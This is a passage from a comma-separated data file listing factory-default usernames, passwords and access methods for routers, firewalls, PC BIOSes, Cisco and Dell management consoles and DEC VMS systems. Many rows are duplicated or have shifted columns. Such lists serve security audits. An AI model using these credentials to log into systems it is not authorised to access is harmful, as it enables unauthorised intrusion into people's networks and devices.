WBR-G54,HTTP,root,,Admin,http://192.168.11.1, +buffalo,Wireless Broadband Base Station-g,,WLA-G54 WBR-G54,root,,,, +buffalo/melco,AirStation,,,root,,,, +cableandwireless,ADSL Modem/Router,,Multi,admin,1234,Admin,, +cabletron,Netgear modem/router and SSR,,,netman,,,, +cabletron,Netgear modem/router and SSR,,,netman,,Admin,, +cabletron,Netgear modem/router and SSR,,Admin,netman,,,, +cabletron,routers & switches,,,,,,, +cabletron,routers &,,,,,,, +canon,iR1023,,Administrator,,0000,,, +canyon,router,,Multi,Administrator,admin,Admin,, +castlenet,,,http,MSO,changeme,ROOT,, +cayman,3220-H DSL Router,,,Any,,,GatorSurf 5., +cayman,Cayman DSL,,,,,,, +cayman,Cayman DSL,,,,,Admin,, +cayman,Cayman DSL,,3220-H,},,,, +cayman,Cayman DSL,,Admin,,,,, +cayman,Cayman DSL,,Admin,},,,, +cayman,Cayman DSL,3220-H,,},,Admin,, +cayman,Cayman DSL,SBC/Pacbell,,admin,(device serial number),Admin,, +cayman,DSL Router,,,admin,(serial number),,, +celerity,Mediator,,,root,Mau,,, +celerity,Mediator,,Admin,root,Mau dib,,, +celerity,Mediator,,Multi,mediator,mediator,,, +celerity,Mediator,,Multi,root,Mau'dib,Admin,Assumption: the password is Mua'dib, +celerity,Mediator,,User,mediator,mediator,,, +celerity,Mediator,Multi,Multi,mediator,mediator,User,, +cellit,CCPro,,Multi,cellit,cellit,Admin,, +cgi world,Poll It,,v2.0,,protection,,, +cgiworld,Poll It,2.0,HTTP,,protection,User/Admin over package,http://server.com/ScriptName.cgi?load=login, +chase research,Iolan,,,,iolan,,, +chaseresearch,Iolan,,,,iolan,,, +checkpoint,,,,admin,qaz123,,, +checkpoint,Firewall-1,,Multi,admin,abc123,admin,, +checkpoint,Firewall-1,,admin,admin,abc123,,, +checkpoint,Interspect 210,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 210N,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 410,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 610,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 610S,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,SecurePlatform,,Admin,admin,admin,,, +checkpoint,SecurePlatform,,NG FP3,admin,admin,,, +checkpoint,SecurePlatform,NG FP3,Console,admin,admin,Admin,, +chuming chen,NessusWeb,,,administrator,adminpass,,, +chumingchen,NessusWeb,,HTTP,administrator,adminpass,Admin,, +ciphertrust,IronMail,Any,Multi,admin,password,Admin,, +cisco,1100,,,,Cisco,Admin,, +cisco,1200,,,Cisco,Cisco,Admin,, +cisco,1300,,,Cisco,Cisco,Admin,, +cisco,1400,,,,Cisco,Admin,, +cisco,2100 aka DPX2100,all versions (comcast-supplied),http://192.168.100.1,,W2402,,password case sensitive, +cisco,2600,,Telnet,Administrator,admin,Admin,, +cisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,,, +cisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,Admin,Default SSID is tsunami. Username/password are case sensitive., +cisco,AP1200,IOS,Multi,Cisco,Cisco,Admin,This is when you convert AP1200 or AP350 to IOS, +cisco,ATA 186,,,admin,,Admin,, +cisco,Aironet 1100,,webadmin,Cisco,Cisco,,, +cisco,Aironet 1100,AP1120B-E-K9,HTTP,Cisco,Cisco,webadmin,, +cisco,Aironet 1200,,,Cisco,Cisco,,, +cisco,Aironet 1200,,HTTP,root,Cisco,Admin,, +cisco,Aironet 1200,,Multi,Cisco,Cisco,,, +cisco,Aironet 1350,,HTTP,admin,tsunami,webadmin,, +cisco,Aironet 1350,,webadmin,admin,tsunami,,, +cisco,Aironet,,Multi,,_Cisco,Admin,, +cisco,Aironet,,Multi,Cisco,Cisco,Admin,, +cisco,Any Router and Switch,,,cisco,cisco,,10 thru 12, +cisco,Arrowpoint,,,admin,system,Admin,, +cisco,BBSD MSDE Client,,5.0 and 5.1,bbsd-client,NULL,,, +cisco,BBSD MSDE Client,,database,bbsd-client,NULL,,, +cisco,BBSD MSDE Client,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,NULL,database,The BBSD Windows Client password will match the BBSD MSDE Client password, +cisco,BBSM Administrator,,5.0 and 5.1,Administrator,changeme,,, +cisco,BBSM Administrator,,Admin,Administrator,changeme,,, +cisco,BBSM Administrator,5.0 and 5.1,Multi,Administrator,changeme,Admin,, +cisco,BBSM MSDE Administrator,,5.0 and 5.1,sa,,,, +cisco,BBSM MSDE Administrator,,Admin,sa,,,, +cisco,BBSM MSDE Administrator,5.0 and 5.1,IP and Named Pipes,sa,,Admin,, +cisco,BBSM,,5.0 and 5.1,bbsd-client,changeme2,,, +cisco,BBSM,,database,bbsd-client,changeme2,,, +cisco,BBSM,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,changeme2,database,The BBSD Windows Client password will match the BBSD MSDE Client password, +cisco,CNR,,Admin,admin,changeme,,, +cisco,CNR,,All,admin,changeme,,, +cisco,CNR,All,CNR GUI,admin,changeme,Admin,This is the default password for Cisco Network Registrar, +cisco,Cache Engine,,,admin,diamond,,, +cisco,Cache Engine,,Admin,admin,diamond,,, +cisco,Cache Engine,,Console,admin,diamond,Admin,, +cisco,Catalyst 4000/5000/6000,,All,,public/private/secret,,, +cisco,Catalyst 4000/5000/6000,,RO/RW/RW+change SNMP config,,public/private/secret,,, +cisco,Catalyst 4000/5000/6000,All,SNMP,,public/private/secret,RO/RW/RW+change SNMP config,default on All Cat switches running the native CatOS CLI software., +cisco,Cisco Broadband Troubleshooter,,,admin,changeme,,, +cisco,Cisco Guard,,SNMP,,riverhead,,, +cisco,Cisco IDS,,,root,attack,,, +cisco,Cisco Works,,,admin,admin,,, +cisco,CiscoWorks 2000,,,admin,cisco,,, +cisco,CiscoWorks 2000,,,admin,cisco,Admin,, +cisco,CiscoWorks 2000,,,guest,,,, +cisco,CiscoWorks 2000,,,guest,,User,, +cisco,CiscoWorks 2000,,Admin,admin,cisco,,, +cisco,CiscoWorks 2000,,User,guest,,,, +cisco,CiscoWorks,,Multi,admin,admin,,, +cisco,Ciso Aironet 1100 series,Rev. 01,HTTP,,Cisco,Admin,, +cisco,ConfigMaker Software,,,,cmaker,,any?, +cisco,ConfigMaker,,,cmaker,cmaker,,, +cisco,ConfigMaker,,,cmaker,cmaker,Admin,, +cisco,ConfigMaker,,Admin,cmaker,cmaker,,, +cisco,Content Engine,,Telnet,admin,default,Admin,, +cisco,E3000,,192.168.1.1,admin,admin,admin,, +cisco,GSR,,Telnet,admin,admin,admin,, +cisco,HSE,,Multi,hsa,hsadb,Admin,, +cisco,HSE,,Multi,root,blender,Admin,, +cisco,IDS (netranger),,,root,attack,,, +cisco,IOS,,,,Cisco router,,, +cisco,IOS,,,,c,,, +cisco,IOS,,,,cc,,, +cisco,IOS,,,,cisco,,, +cisco,IOS,,,cisco,cisco,,, +cisco,IOS,,,enable,cisco,,, +cisco,IOS,,,private ReadWrite access,secret,,, +cisco,IOS,,,public ReadOnly access,secret,,, +cisco,IOS,,,ripeop,(no pw),,, +cisco,IOS,,11.x-12.x,,ILMI,,, +cisco,IOS,,12.1(3),,cable-docsis,,, +cisco,IOS,,2600 series,,c,,, +cisco,IOS,,Admin,,c,,, +cisco,IOS,,Multi,,Cisco router,,, +cisco,IOS,,Multi,,c,Admin,, +cisco,IOS,,Multi,,cc,,, +cisco,IOS,,Multi,,cisco,,, +cisco,IOS,,Multi,cisco,cisco,,, +cisco,IOS,,Multi,enable,cisco,,, +cisco,IOS,,Multi,ripeop,,,, +cisco,IOS,,SNMP read-write,,cable-docsis,,, +cisco,IOS,,SNMP,private ReadWrite access,secret,Read/write,, +cisco,IOS,,SNMP,public ReadOnly access,secret,Read,, +cisco,IOS,,limited READ/WRITE,,ILMI,,, +cisco,IOS,11.x-12.x,SNMP,,ILMI,limited READ/WRITE,, +cisco,IOS,12.1(3),SNMP,,cable-docsis,SNMP read-write,, +cisco,IOS,2600 Series,Multi,,c,Admin,, +cisco,IP Conference Station,7936,HTTP,End User,7936,,, +cisco,MGX,,,superuser,superuser,,*, +cisco,NA,,,prixadmin,prixadmin,,NA, +cisco,Net Ranger 2.2.1,,,root,attack,,Sol 5.6, +cisco,Netranger/secure IDS,,,netrangr,attack,,, +cisco,Netranger/secure IDS,,3.0(5)S17,root,attack,,, +cisco,Netranger/secure IDS,,Admin,root,attack,,, +cisco,Netranger/secure IDS,,Multi,netrangr,attack,,, +cisco,Netranger/secure IDS,3.0(5)S17,Multi,root,attack,Admin,must be changed at the first connection, +cisco,Network Registrar (CNR),,,admin,changeme,,, +cisco,PIX firewall,,Telnet,,cisco,UID=pix,, +cisco,PIX,,,,cisco,,, +cisco,Traffic Anomaly Detector,,SNMP,,riverhead,,, +cisco,Trailhead,,4.0,admin,admin,,, +cisco,Trailhead,4.0,HTTP,admin,admin,Admin,, +cisco,Unity,,,EAdmin,,,, +cisco,Unity,,,ESubscriber,,,, +cisco,Unity,,,UAMIS_,,,, +cisco,Unity,,,UNITY_,,,, +cisco,Unity,,,UOMNI_,,,, +cisco,Unity,,,UVPIM_,,,, +cisco,Unity,,1.3.2,bubba,,,, +cisco,Unity,1.3.2,local,bubba,(unk),,Part numbers imprinted on the installation disks with a local user account bubba, +cisco,VPN 3000 Concentrator,,,admin,admin,,, +cisco,VPN Concentrator 3000 series,3,Multi,admin,admin,Admin,, +cisco,WLSE,,Multi,root,blender,Admin,, +cisco,WLSE,,Multi,wlse,wlsedb,Admin,, +cisco,any,,,no default login,no default password,,any IOS, +cisco,cva 122,,,admin,admin,,, +cisco,cva 122,,Admin,admin,admin,,, +cisco,cva 122,,Telnet,admin,admin,Admin,, +cisco-arrowpoint,Arrowpoint,,,admin,system,,, +cisco-arrowpoint,Arrowpoint,,Admin,admin,system,,, +claris,At-Ease,,,,familymacintosh,,, +cnet,804-nf,,Admin,Admin,epicrouter,,, +cnet,804-nf,,HTTP,Admin,epicrouter,Admin,, +cnet,804-nf,,HTTP,admin,password,http://,, +cnet,804-nf,,http:// ,admin,password,,, +cnet,CNET 4PORT ADSL MODEM,CNAD NF400,Multi,admin,epicrouter,Admin,, +cobalt,RaQ * Qube*,,,admin,admin,,Any, +cobalt,Unknown,,,admin,admin,,, +colubris,MSC,5100,user,admin,admin,admin,continue with https, +colubrisnetworks,MSC 5100,5100,http -> https,admin,admin,Admin,make exception for invalid certificate to continue with https, +comersus,Comersus Shopping Cart,3.2,,,admin,dmr99,, +comersus,Shopping Cart,,,admin,dmr99,,, +compaq,Familiar Linux,,,root,rootme,,, +compaq,Familiar Linux,,telnet/ssh/con,root,rootme,Admin,, +compaq,Insight Manager,,,PFCUser,240653C9467E45,,, +compaq,Insight Manager,,,PFCUser,240653C9467E45,User,, +compaq,Insight Manager,,,administrator,administrator,,, +compaq,Insight Manager,,,administrator,administrator,Admin,, +compaq,Insight Manager,,,anonymous,,,, +compaq,Insight Manager,,,anonymous,,User,, +compaq,Insight Manager,,,operator,operator,,, +compaq,Insight Manager,,,user,public,,, +compaq,Insight Manager,,,user,public,User,, +compaq,Insight Manager,,,user,user,,, +compaq,Insight Manager,,,user,user,User,, +compaq,Insight Manager,,Admin,administrator,administrator,,, +compaq,Insight Manager,,User,PFCUser,240653C9467E45,,, +compaq,Insight Manager,,User,anonymous,,,, +compaq,Insight Manager,,User,user,public,,, +compaq,Insight Manager,,User,user,user,,, +compaq,Management Agents,,,administrator,,,All, +compaq,Networth FastPipes,,,root,manager,,, +compaq,Networth FastPipes,,Console,root,manager,,, +compaq,PC BIOS,,,,Compaq,,, +compaq,PC BIOS,,Admin,,Compaq,,, +compaq,PC BIOS,,Console,,Compaq,Admin,, +compaq,T1010,,@ , ,use ALT+G at boot to reset config,,, +compaq,T1010,,Multi,,use ALT+G at boot to reset config,@,, +compaq,WBEM,,,administrator,administrator,,, +compaq,WBEM,,HTTP 2301 / HTTPS 2381,administrator,administrator,Admin,, +compex,NetPassage 15BR,,http://192.168.168.1,,password,Administration,, +compex,NetPassage 18,,http://192.168.168.1,,password,Administration,, +compualynx,Cmail Server,,All Versions,administrator,asecret,,, +compualynx,Cmail Server,all,multi,administrator,asecret,Admin,, +compualynx,Cproxy Server,,All Versions,administrator,asecret,,, +compualynx,Cproxy Server,all,multi,administrator,asecret,Admin,, +compualynx,SCM,,All Versions,administrator,asecret,,, +compualynx,SCM,all,multi,administrator,asecret,Admin,, +computer associates,ControlIT,,,DEFAULT,default,,, +computer associates,ControlIT,,Desktop/console access,DEFAULT,default,,, +computerassociates,ControlIT,,ControlIT,DEFAULT,default,Desktop/console access,, +comtrend,CT-5361T,,192.168.1.1,root,12345,,, +comtrend,CT-5361T,,http192.168.2.1,user,12345,View Device Info, and Error Log., +comtrend,CT560,,http://192.168.1.1,aolbb,setup,Admin,, +comtrend,ct536+,,Multi,admin,,Admin,, +conceptronic,C100BRS4H,,,admin,1234,,, +conceptronic,C100BRS4H,,HTTP,admin,1234,,, +conceptronic,CADSLR4,,HTTP/telnet,admin,password,Admin,Default IP 192.168.1.254, +conceptronic,CADSLR4,,HTTP/telnet,anonymous,password,anon,Default IP 192.168.1.254, +conceptronic,CFULLHDMAi,,telnet port 4836,,conceptronic2008,,, +conceptronic,cdeskcam,1.0,,conceptronic,,,camera, +concord,PC BIOS,,,,last,,, +concord,PC BIOS,,,,last,Admin,, +concord,PC BIOS,,Admin,,last,,, +conexant,ACCESS RUNNER ADSL CONSOLE PORT 3.27,,Telnet,Administrator,admin,Admin,, +conexant,PAE-CE81,,,admin,epicrouter,,, +conexant,PAE-CE81,,Multi,admin,epicrouter,,, +conexant,Router,,HTTP,,admin,Admin,yes, +conexant,Router,,HTTP,,epicrouter,Admin,, +conexant,Router,,HTTP,admin,amigosw1,Admin,, +conexant,Router,,HTTP,admin,conexant,Admin,, +conexant,Router,,HTTP,admin,epicrouter,Admin,, +conexant,Router,,HTTP,admin,password,Admin,, +conexant,four port ethernet switch,,,admin,epicrouter,,, +conitec,3D Gamestudio,,Capek,Adam,29111991,,, +conitec,3D Gamestudio,6.22,Serial,Adam,29111991,Capek,, +corecess,3113,,Multi,admin,,Admin,, +corecess,6808 APC,,Telnet,corecess,corecess,User,, +corecess,Corecess 3112,,HTTP,Administrator,admin,Admin,, +coyotepoint,Equaliser 4,,,eqadmin - Serial port only,equalizer,,Free BSD, +coyotepoint,Equaliser 4,,,look,look,,Free BSD - Web Browser only, +coyotepoint,Equaliser 4,,,root ,,,Free BSD - Serial port only, +coyotepoint,Equaliser 4,,,touch,touch,,Free BSD - Web Browser only, +creative,2015U,,Multi,,,Admin,, +crystalview,OutsideView 32,,,,Crystal,,, +crystalview,OutsideView 32,,,,Crystal,Admin,, +crystalview,OutsideView 32,,Admin,,Crystal,,, +ctcunion,ATU-R130,81001a,Multi,root,root,Admin,, +ctx international,PC BIOS,,,,CTX_123,,, +ctx international,PC BIOS,,Admin,,CTX_123,,, +ctxinternational,PC BIOS,,Console,,CTX_123,Admin,, +cyberguard,Firewall,,,cgadmin,cgadmin,,, +cyberguard,SG300,,http://192.168.0.1,root,default,Administration,, +cyberguard,SG560,,http://192.168.0.1,root,default,Administration,, +cyberguard,SG565,,http://192.168.0.1,root,default,Administration,, +cyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin,, +cybermax,PC BIOS,,,,Congress,,, +cybermax,PC BIOS,,Admin,,Congress,,, +cybermax,PC BIOS,,Console,,Congress,Admin,, +cyclades,Cyclades-TS800,,TS800,root,tslinux,,, +cyclades,MP/RT,,,super,surt,,, +cyclades,PR-1000,,,super,surt,,, +cyclades,PR-1000,,Telnet,super,surt,Admin,, +cyclades,PR1000,,,super,surt,,, +cyclades,TS800,,HTTP,root,tslinux,Admin,, +cyclades,TS800,,telnet/ssh/http,root,,Admin,, +d-link,604,,,Admin,,,, +d-link,Cable/DSL Routers/Switches,,Admin,,admin,,, +d-link,D-704P,,rev b,admin,,,, +d-link,DCS-1000,,admin,,,,, +d-link,DI-524,,Admin,admin,,,, +d-link,DI-604,,Admin,user,,,, +d-link,DI-604,,rev a rev b rev c rev e,admin,,,, +d-link,DI-614+,,Admin,admin,,,, +d-link,DI-614+,,User,user,,,, +d-link,DI-624,,,admin,,,, +d-link,DI-624,,192.168.0.1,Admin,,,, +d-link,DI-701,,Admin,admin,year2000,,, +d-link,DI-704,,rev a,,admin,,, +d-link,DI-714P+,,192.168.0.1,admin,____BLANK___,,, +d-link,DI-804,,Admin,admin,,,, +d-link,DI-804,,v2.03,admin,,,, +d-link,DSL-300,,,,private,,, +d-link,DSL-300G+,,admin?,,private,,, +d-link,DSL-504,,,,private,,, +d-link,DSL-G664T,,,admin,admin,,, +d-link,DWL 900AP,,,,public,,, +d-link,DWL 900AP,,Admin,admin,public,,, +d-link,Routers,,DI-764,admin,,,, +d-link,hubs/switches,,,D-Link,D-Link,,, +daewoo,PC BIOS,,,,Daewuu,,, +daewoo,PC BIOS,,Admin,,Daewuu,,, +daewoo,PC BIOS,,Console,,Daewuu,Admin,, +dallas semiconductors,TINI embedded JAVA Module,,<= 1.0,root,tini,,, +dallas semiconductors,TINI embedded JAVA Module,,Admin,root,tini,,, +dallas semiconductors,TINI embedded JAVA Module,,tini,Telnet,root,,, +dallassemiconductors,TINI embedded JAVA Module,1.0 or lower,Telnet,root,tini,Admin,, +dallassemiconductors,TINI embedded JAVA Module,1.0,Telnet,root,tini,Admin,, +dallassemiconductors,TINI embedded JAVA Module,below 1.0,Telnet,root,tini,Admin,, +darkman,ioFTPD,,root,ioFTPD,ioFTPD,,, +darkman,ioFTPD,all,Other,ioFTPD,ioFTPD,root,, +data general,AOS/VS,,,op,operator,,, +data general,AOS/VS,,,operator,operator,,, +datacom,BSASX/101,,,,letmein,,, +datacom,BSASX/101,,,,letmein,Admin,, +datacom,BSASX/101,,Admin,,letmein,,, +datacom,NSBrowse,,,sysadm,sysadm,,, +datacom,NSBrowse,,,sysadm,sysadm,Admin,, +datageneral,AOS/VS,,multi,op,op,Admin,, +datageneral,AOS/VS,,multi,op,operator,Admin,, +datageneral,AOS/VS,,multi,operator,operator,Admin,, +datawizard.net,FTPXQ server,,,anonymous,any@,,, +datawizard.net,FTPXQ server,,read/write,anonymous,any,,, +datawizardtechnologiesinc,FtpQX server,,FTP,anonymous,(any),Read only on C: by default,, +datawizardtechnologiesinc,FtpQX server,,FTP,test,test,Test user has R/W permission on C: drive by default,, +davolink,DV2020,,Http://192.168.1.1,user,user,user settings,, +davox,Unison,,Multi,admin,admin,User,, +davox,Unison,,Multi,davox,davox,User,, +davox,Unison,,Multi,root,davox,Admin,, +davox,Unison,,Sybase,sa,,Admin,, +daytek,PC BIOS,,,,Daytec,,, +daytek,PC BIOS,,Admin,,Daytec,,, +daytek,PC BIOS,,Console,,Daytec,Admin,, +debian,Linux LILO Default,,2.2,,tatercounter2000,,, +debian,Linux LILO Default,2.2,console,,tatercounter2000,Admin,, +decnet,decnet,,,operator,admin,,, +decnet,decnet,,Guest,operator,admin,,, +deerfield,MDaemon,,HTTP,MDaemon,MServer,Admin,web interface to manage MDaemon. fixed June 2002, +deerfield,WorldClient and MDaemon,,5.0.5.0,MDaemon,MServer,,, +deerfield,WorldClient,5.0.5.0,,MDaemon,MServer,,Can be used to send/recv mail remotely, +dell latitude cpx,dell,,,admin,admin,,, +dell,CSr500xt,,,,admin,,, +dell,CSr500xt,,Admin,,admin,,, +dell,CSr500xt,,Multi,,admin,Admin,, +dell,DRAC,,,root,calvin,management,, +dell,ERA,,,root,calvin,,, +dell,ERA,,,root,calvin,Admin - Embedded remote access,, +dell,Inspiron,,Multi,,admin,Admin,, +dell,Laser Printer 3000cn / 3100cn,,HTTP,admin,password,Admin,, +dell,Latitude CMOS,CPi,console,,nx0nu4bbe,,Enter password then CTRL+Enter, +dell,Latitude,,Admin,,1RRWTTOOI,,, +dell,Latitude,,Bios D35B,,1RRWTTOOI,,, +dell,Latitude,Bios D35B,Multi,,1RRWTTOOI,Admin,, +dell,Lattitude CMOS,,CPi,,nz0u4bbe,,, +dell,OpenManage Server Console,,,root,calvin,,, +dell,OpenManage Server Console,,Admin,root,calvin,,, +dell,OpenManage Server Console,,Console,root,calvin,Admin,, +dell,PC BIOS,,,,Dell,,, +dell,PC BIOS,,Admin,,Dell,,, +dell,PC BIOS,,Console,,Dell,Admin,, +dell,PowerEdge 1655MC,,,admin,admin,Admin,, +dell,PowerEdge 2650 RAC,,,root,calvin,,, +dell,PowerEdge 2650 RAC,,HTTP,root,calvin,,, +dell,PowerVault 35F,,,root,calvin,,, +dell,PowerVault 50F,,,root,calvin,,, +dell,PowerVault TL-2000/4000,,http://,Admin,secure,,, +dell,Powerapp Web 100 Linux,,,root,powerapp,,RedHat 6.2, +dell,Poweredge,,1655MC,admin,admin,,, +dell,RAC,,,root,calvin,,, +dell,Remote Access Card,,HTTP,root,calvin,Admin,, +dell,Switch PowerConnect,,,admin,admin,,, +dell,Switch PowerConnect,,,admin,admin,Admin,, +dell,TrueMobile 1184 Wireless Broadband Gateway Router,,Admin,admin,admin,,, +dell,TrueMobile 1184 Wireless Broadband Gateway Router,,unknown,admin,admin,,, +dell,TrueMobile 1184 Wireless Broadband Gateway Router,unknown,HTTP,admin,admin,Admin,, +dell,TrueMobile 2300 Router,,,admin,admin,,, +dell,inspiron,,,,admin,,, +dell,inspiron,,Admin,,admin,,, +dell,latitude,,a05,,admin,,, +demarc,Network Monitor,,,admin,my_DEMARC,,, +demarc,Network Monitor,,Admin,admin,my_DEMARC,,, +demarc,Network Monitor,,multi,admin,my_DEMARC,Admin,, +deutschetelekom,T-Sinus 130 DSL,,HTTP,,0,Admin,, +deutschetelekom,T-Sinus 154 DSL,13.9.38,HTTP,,0,Admin,thx to AwdCzAb, +deutschetelekom,T-Sinus DSL 130,,HTTP,admin,,Admin,Usuallay also a WirelessLan AP :), +develcon,Orbitor Default Console,,,,BRIDGE,,, +develcon,Orbitor Default Console,,,,BRIDGE,Admin,, +develcon,Orbitor Default Console,,,,password,,, +develcon,Orbitor Default Console,,,,password,Admin,, +develcon,Orbitor Default Console,,Admin,,BRIDGE,,, +develcon,Orbitor Default Console,,Admin,,password,,, +dictaphone,ProLog,,,NETOP,,,, +dictaphone,ProLog,,,NETWORK,NETWORK,,, +dictaphone,ProLog,,,PBX,PBX,,, +digiboard,Portserver 8 & 16,,,root,dbps,,any, +digicom,Michelangelo,,Multi,admin,michelangelo,Admin,, +digicom,Michelangelo,,Multi,user,password,User,, +digicorp,Router,,,,BRIDGE,Admin,, +digicorp,Router,,,,password,Admin,, +digicorp,Viper,,,,BRIDGE,,, +digicorp,Viper,,Admin,,BRIDGE,,, +digicorp,Viper,,Admin,,password,,, +digicorp,Viper,,Telnet,,BRIDGE,Admin,, +digicorp,Viper,,Telnet,,password,Admin,, +digicraft software,Yak!,,2.0.1,Yak,asd123,,, +digicraftsoftware,Yak!,2.0.1,FTP (default port 3535),Yak,asd123,,, +digiinternational,Digi One SP,all versions,http,root,dbps,Full configuration,Device default to DHCP for IP address., +digital equipment,10-Dec,,,1,manager,,, +digital equipment,10-Dec,,,2,maintain,,, +digital equipment,10-Dec,,,2,operator,,, +digital equipment,10-Dec,,,30,games,,, +digital equipment,10-Dec,,,5,games,,, +digital equipment,10-Dec,,,7,maintain,,, +digital equipment,DEC-10,,,1,manager,,, +digital equipment,DEC-10,,,2,operator,,, +digital equipment,DEC-10,,,30,games,,, +digital equipment,DEC-10,,,5,games,,, +digital equipment,DEC-10,,,7,maintain,,, +digital equipment,DEC-10,,Admin,1,manager,,, +digital equipment,DEC-10,,Admin,1,operator,,, +digital equipment,DEC-10,,Admin,1,syslib,,, +digital equipment,DEC-10,,Admin,2,maintain,,, +digital equipment,DEC-10,,Admin,2,manager,,, +digital equipment,DEC-10,,Admin,2,operator,,, +digital equipment,DEC-10,,Admin,2,syslib,,, +digital equipment,DEC-10,,User,30,games,,, +digital equipment,DEC-10,,User,5,games,,, +digital equipment,DEC-10,,User,7,maintain,,, +digital equipment,DecServer,,,,ACCESS,,, +digital equipment,DecServer,,Admin,,ACCESS,,, +digital equipment,DecServer,,Admin,,SYSTEM,,, +digital equipment,IRIS,,,PDP11,PDP11,,, +digital equipment,IRIS,,,PDP8,PDP8,,, +digital equipment,IRIS,,,accounting,accounting,,, +digital equipment,IRIS,,,boss,boss,,, +digital equipment,IRIS,,,demo,demo,,, +digital equipment,IRIS,,,manager,manager,,, +digital equipment,IRIS,,,software,software,,, +digital equipment,IRIS,,Admin,accounting,accounting,,, +digital equipment,IRIS,,Admin,boss,boss,,, +digital equipment,IRIS,,Admin,manager,manager,,, +digital equipment,IRIS,,User,PDP11,PDP11,,, +digital equipment,IRIS,,User,PDP8,PDP8,,, +digital equipment,IRIS,,User,demo,demo,,, +digital equipment,IRIS,,User,software,software,,, +digital equipment,PC BIOS,,,,komprie,,, +digital equipment,PC BIOS,,Admin,,komprie,,, +digital equipment,RSX,,,,1,,, +digital equipment,RSX,,,1.1,SYSTEM,,, +digital equipment,RSX,,,BATCH,BATCH,,, +digital equipment,RSX,,,SYSTEM,MANAGER,,, +digital equipment,RSX,,,USER,USER,,, +digital equipment,RSX,,Admin,1.1,SYSTEM,,, +digital equipment,RSX,,Admin,SYSTEM,MANAGER,,, +digital equipment,RSX,,Admin,SYSTEM,SYSTEM,,, +digital equipment,RSX,,User,BATCH,BATCH,,, +digital equipment,RSX,,User,USER,USER,,, +digital equipment,Terminal Server,,,,access,,, +digital equipment,Terminal Server,,,,system,,, +digital equipment,Terminal Server,,Admin,,system,,, +digital equipment,Terminal Server,,User,,access,,, +digital equipment,VMS,,,ALLIN1,ALLIN1,,, +digital equipment,VMS,,,ALLIN1MAIL,ALLIN1MAIL,,, +digital equipment,VMS,,,ALLINONE,ALLINONE,,, +digital equipment,VMS,,,BACKUP,BACKUP,,, +digital equipment,VMS,,,DCL,DCL,,, +digital equipment,VMS,,,DECMAIL,DECMAIL,,, +digital equipment,VMS,,,DECNET,DECNET,,, +digital equipment,VMS,,,DECNET,NONPRIV,,, +digital equipment,VMS,,,DEFAULT,DEFAULT,,, +digital equipment,VMS,,,DEFAULT,USER,,, +digital equipment,VMS,,,DEMO,DEMO,,, +digital equipment,VMS,,,FIELD,DIGITAL,,, +digital equipment,VMS,,,FIELD,FIELD,,, +digital equipment,VMS,,,FIELD,SERVICE,,, +digital equipment,VMS,,,FIELD,TEST,,, +digital equipment,VMS,,,GUEST,GUEST,,, +digital equipment,VMS,,,HELP,HELP,,, +digital equipment,VMS,,,HELPDESK,HELPDESK,,, +digital equipment,VMS,,,HOST,HOST,,, +digital equipment,VMS,,,INFO,INFO,,, +digital equipment,VMS,,,INGRES,INGRES,,, +digital equipment,VMS,,,LINK,LINK,,, +digital equipment,VMS,,,MAILER,MAILER,,, +digital equipment,VMS,,,MBMANAGER,MBMANAGER,,, +digital equipment,VMS,,,MBWATCH,MBWATCH,,, +digital equipment,VMS,,,NETCON,NETCON,,, +digital equipment,VMS,,,NETMGR,NETMGR,,, +digital equipment,VMS,,,NETNONPRIV,NETNONPRIV,,, +digital equipment,VMS,,,NETPRIV,NETPRIV,,, +digital equipment,VMS,,,NETSERVER,NETSERVER,,, +digital equipment,VMS,,,NETWORK,NETWORK,,, +digital equipment,VMS,,,NEWINGRES,NEWINGRES,,, +digital equipment,VMS,,,NEWS,NEWS,,, +digital equipment,VMS,,,OPERVAX,OPERVAX,,, +digital equipment,VMS,,,POSTMASTER,POSTMASTER,,, +digital equipment,VMS,,,PRIV,PRIV,,, +digital equipment,VMS,,,REPORT,REPORT,,, +digital equipment,VMS,,,RJE,RJE,,, +digital equipment,VMS,,,STUDENT,STUDENT,,, +digital equipment,VMS,,,SYS,SYS,,, +digital equipment,VMS,,,SYSMAINT,DIGITAL,,, +digital equipment,VMS,,,SYSMAINT,SERVICE,,, +digital equipment,VMS,,,SYSMAINT,SYSMAINT,,, +digital equipment,VMS,,,SYSTEM,MANAGER,,, +digital equipment,VMS,,,SYSTEM,OPERATOR,,, +digital equipment,VMS,,,SYSTEM,SYSLIB,,, +digital equipment,VMS,,,SYSTEM,SYSTEM,,, +digital equipment,VMS,,,SYSTEST,UETP,,, +digital equipment,VMS,,,SYSTEST_CLIG,SYSTEST,,, +digital equipment,VMS,,,SYSTEST_CLIG,SYSTEST_CLIG,,, +digital equipment,VMS,,,TELEDEMO,TELEDEMO,,, +digital equipment,VMS,,,TEST,TEST,,, +digital equipment,VMS,,,UETP,UETP,,, +digital equipment,VMS,,,USER,PASSWORD,,, +digital equipment,VMS,,,USERP,USERP,,, +digital equipment,VMS,,,VAX,VAX,,, +digital equipment,VMS,,,VMS,VMS,,, +digitalequipment,DEC-10,,Multi,1,manager,Admin,, +digitalequipment,DEC-10,,Multi,1,operator,Admin,, +digitalequipment,DEC-10,,Multi,1,syslib,Admin,, +digitalequipment,DEC-10,,Multi,2,maintain,Admin,, +digitalequipment,DEC-10,,Multi,2,manager,Admin,, +digitalequipment,DEC-10,,Multi,2,operator,Admin,, +digitalequipment,DEC-10,,Multi,2,syslib,Admin,, +digitalequipment,DEC-10,,Multi,30,games,User,, +digitalequipment,DEC-10,,Multi,5,games,User,, +digitalequipment,DEC-10,,Multi,7,maintain,User,, +digitalequipment,DecServer,,Multi,,ACCESS,Admin,, +digitalequipment,DecServer,,Multi,,SYSTEM,Admin,, +digitalequipment,IRIS,,Multi,PDP11,PDP11,User,, +digitalequipment,IRIS,,Multi,PDP8,PDP8,User,, +digitalequipment,IRIS,,Multi,accounting,accounting,Admin,, +digitalequipment,IRIS,,Multi,boss,boss,Admin,, +digitalequipment,IRIS,,Multi,demo,demo,User,, 